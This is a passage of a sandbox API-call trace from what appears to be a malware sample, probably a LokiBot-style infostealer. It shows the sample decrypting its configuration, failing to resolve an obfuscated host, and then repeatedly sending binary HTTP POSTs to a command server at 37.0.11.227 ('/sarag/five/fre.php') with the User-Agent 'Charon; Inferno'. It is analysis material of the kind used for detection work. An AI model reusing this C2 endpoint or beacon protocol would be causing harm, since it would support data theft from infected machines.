(lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0243.898] GetProcessHeap () returned 0x690000 [0243.898] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0243.898] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0243.899] GetProcessHeap () returned 0x690000 [0243.899] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0243.899] GetProcessHeap () returned 0x690000 [0243.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0243.900] GetProcessHeap () returned 0x690000 [0243.901] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0243.901] GetProcessHeap () returned 0x690000 [0243.901] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0243.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.902] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.908] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0243.914] GetProcessHeap () returned 0x690000 [0243.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0243.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.917] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0243.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.918] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.919] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.919] GetProcessHeap () returned 0x690000 [0243.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0243.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.921] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0243.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.922] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0243.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.923] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0243.923] GetProcessHeap () returned 0x690000 [0243.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0243.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.924] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0243.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.925] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0243.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.926] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0243.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.927] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0243.927] GetProcessHeap () returned 0x690000 [0243.927] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0243.927] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0243.928] GetProcessHeap () returned 0x690000 [0243.928] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0243.928] socket (af=2, type=1, protocol=6) returned 0x688 [0243.928] connect (s=0x688, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0243.955] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0243.955] GetProcessHeap () returned 0x690000 [0243.955] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0243.955] GetProcessHeap () returned 0x690000 [0243.955] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0243.956] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0243.956] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0243.957] GetProcessHeap () returned 0x690000 [0243.957] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0243.957] GetProcessHeap () returned 0x690000 [0243.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0243.958] GetProcessHeap () returned 0x690000 [0243.958] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0243.958] GetProcessHeap () returned 0x690000 [0243.958] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0243.958] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0243.959] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0243.959] GetProcessHeap () returned 0x690000 [0243.959] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0243.959] GetProcessHeap () returned 0x690000 [0243.960] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0243.960] send (s=0x688, buf=0x6ad508*, len=242, flags=0) returned 242 [0243.961] send (s=0x688, buf=0x6aba40*, len=159, flags=0) returned 159 [0243.961] GetProcessHeap () returned 0x690000 [0243.961] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0243.961] recv (in: s=0x688, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0244.039] GetProcessHeap () returned 0x690000 [0244.039] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0244.042] GetProcessHeap () returned 0x690000 [0244.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0244.043] GetProcessHeap () returned 0x690000 [0244.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0244.043] GetProcessHeap () returned 0x690000 [0244.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0244.045] closesocket (s=0x688) returned 0 [0244.045] GetProcessHeap () returned 0x690000 [0244.045] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0244.045] GetProcessHeap () returned 0x690000 [0244.046] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0244.046] GetProcessHeap () returned 0x690000 [0244.046] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0244.046] GetProcessHeap () returned 0x690000 [0244.047] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0244.047] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xde0) returned 0x688 [0244.050] Sleep (dwMilliseconds=0xea60) [0244.052] GetProcessHeap () returned 0x690000 [0244.052] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0244.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.054] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.060] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0244.066] GetProcessHeap () returned 0x690000 [0244.066] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0244.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.067] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0244.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.068] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.069] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.069] GetProcessHeap () returned 0x690000 [0244.069] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0244.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.070] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0244.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.071] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0244.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.072] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0244.072] GetProcessHeap () returned 0x690000 [0244.072] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0244.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.073] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0244.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.074] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0244.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.077] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0244.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.078] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0244.078] GetProcessHeap () returned 0x690000 [0244.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0244.078] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0244.079] GetProcessHeap () returned 0x690000 [0244.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0244.079] GetProcessHeap () returned 0x690000 [0244.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0244.080] GetProcessHeap () returned 0x690000 [0244.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0244.080] GetProcessHeap () returned 0x690000 [0244.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0244.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.082] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.087] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0244.095] GetProcessHeap () returned 0x690000 [0244.095] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0244.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.096] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0244.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.098] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.099] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.099] GetProcessHeap () returned 0x690000 [0244.099] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0244.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.100] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0244.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.102] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0244.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.102] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0244.102] GetProcessHeap () returned 0x690000 [0244.102] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0244.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.105] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0244.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.106] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0244.107] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.107] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0244.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.108] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0244.108] GetProcessHeap () returned 0x690000 [0244.108] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0244.108] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0244.108] GetProcessHeap () returned 0x690000 [0244.108] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0244.108] socket (af=2, type=1, protocol=6) returned 0x68c [0244.109] connect (s=0x68c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0244.138] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0244.138] GetProcessHeap () returned 0x690000 [0244.138] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0244.138] GetProcessHeap () returned 0x690000 [0244.138] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0244.139] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0244.140] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0244.140] GetProcessHeap () returned 0x690000 [0244.140] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0244.140] GetProcessHeap () returned 0x690000 [0244.141] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0244.141] GetProcessHeap () returned 0x690000 [0244.141] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0244.141] GetProcessHeap () returned 0x690000 [0244.141] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0244.142] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0244.143] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0244.143] GetProcessHeap () returned 0x690000 [0244.143] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0244.143] GetProcessHeap () returned 0x690000 [0244.143] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0244.143] send (s=0x68c, buf=0x6ad508*, len=242, flags=0) returned 242 [0244.144] send (s=0x68c, buf=0x6aba40*, len=159, flags=0) returned 159 [0244.144] GetProcessHeap () returned 0x690000 [0244.144] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0244.144] recv (in: s=0x68c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0244.228] GetProcessHeap () returned 0x690000 [0244.228] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0244.229] GetProcessHeap () returned 0x690000 [0244.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0244.230] GetProcessHeap () returned 0x690000 [0244.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0244.230] GetProcessHeap () returned 0x690000 [0244.231] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0244.231] closesocket (s=0x68c) returned 0 [0244.232] GetProcessHeap () returned 0x690000 [0244.232] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0244.232] GetProcessHeap () returned 0x690000 [0244.233] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0244.233] GetProcessHeap () returned 0x690000 [0244.233] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0244.233] GetProcessHeap () returned 0x690000 [0244.233] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0244.234] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe1c) returned 0x68c [0244.237] Sleep (dwMilliseconds=0xea60) [0244.239] GetProcessHeap () returned 0x690000 [0244.239] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0244.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.241] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.248] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0244.259] GetProcessHeap () returned 0x690000 [0244.259] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0244.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.260] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0244.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.261] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.262] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.262] GetProcessHeap () returned 0x690000 [0244.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0244.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.269] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0244.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.270] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0244.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.272] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0244.272] GetProcessHeap () returned 0x690000 [0244.272] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0244.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.273] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0244.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.274] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0244.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.275] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0244.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.276] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0244.276] GetProcessHeap () returned 0x690000 [0244.276] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0244.276] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0244.276] GetProcessHeap () returned 0x690000 [0244.276] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0244.277] GetProcessHeap () returned 0x690000 [0244.277] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0244.277] GetProcessHeap () returned 0x690000 [0244.277] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0244.277] GetProcessHeap () returned 0x690000 [0244.277] RtlAllocateHeap 